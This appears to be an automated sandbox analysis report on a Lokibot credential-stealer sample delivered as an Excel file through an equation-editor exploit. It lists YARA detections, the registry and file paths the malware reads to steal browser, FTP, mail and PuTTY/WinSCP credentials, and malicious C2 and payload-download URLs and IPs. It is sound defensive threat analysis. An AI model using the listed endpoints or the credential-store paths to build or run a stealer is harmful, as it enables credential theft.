Source: Yara match File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Yara detected Lokibot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
Tries to harvest and steal ftp login credentials
Source: C:\Users\Public\vbc.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\Public\vbc.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\Public\vbc.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\Public\vbc.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to steal Mail credentials (via file registry)
Source: C:\Users\Public\vbc.exe Code function: HeapCreate, PopPassword 4_2_0040D069
Source: C:\Users\Public\vbc.exe Code function: HeapCreate, SmtpPassword 4_2_0040D069
Yara detected Credential Stealer
Source: Yara match File source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Lokibot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Behavior Graph:

Behavior Graph ID: 353332 Sample: MV FORTUNE TRADER.xlsx Startdate: 16/02/2021 Architecture: WINDOWS Score: 100

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 17 other signatures

EXCEL.EXE started

EQNEDT32.EXE started
  DNS/IP: stdyrusschinetwomast.dns.army 103.141.138.123, 49167, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam
  DNS/IP: cutt.ly 172.67.8.238, 443, 49165 CLOUDFLARENETUS United States
  Dropped: C:\Users\user\AppData\Local\...\regasm[1].exe, PE32
  Dropped: C:\Users\Public\vbc.exe, PE32
  Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  Started: vbc.exe

vbc.exe started (by EQNEDT32.EXE)
  DNS/IP: becharnise.ir 185.208.180.121, 49168, 80 AMINIDCIR Iran (ISLAMIC Republic Of)
  Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); 6 other signatures

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.8.238 | unknown | United States | 13335 | CLOUDFLARENETUS | false
103.141.138.123 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true
185.208.180.121 | unknown | Iran (ISLAMIC Republic Of) | 48147 | AMINIDCIR | true

Contacted Domains

Name IP Active
cutt.ly 172.67.8.238 true
becharnise.ir 185.208.180.121 true
stdyrusschinetwomast.dns.army 103.141.138.123 true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://kbfvzoboss.bid/alien/fre.php | true | 14%, Virustotal; Avira URL Cloud: safe | unknown
http://alphastand.win/alien/fre.php | true | 10%, Virustotal; Avira URL Cloud: safe | unknown
http://alphastand.trade/alien/fre.php | true | 11%, Virustotal; Avira URL Cloud: safe | unknown
http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe | true | 10%, Virustotal; Avira URL Cloud: malware | unknown
http://alphastand.top/alien/fre.php | true | Avira URL Cloud: safe | unknown
http://becharnise.ir/fa13/fre.php | true | Avira URL Cloud: safe | unknown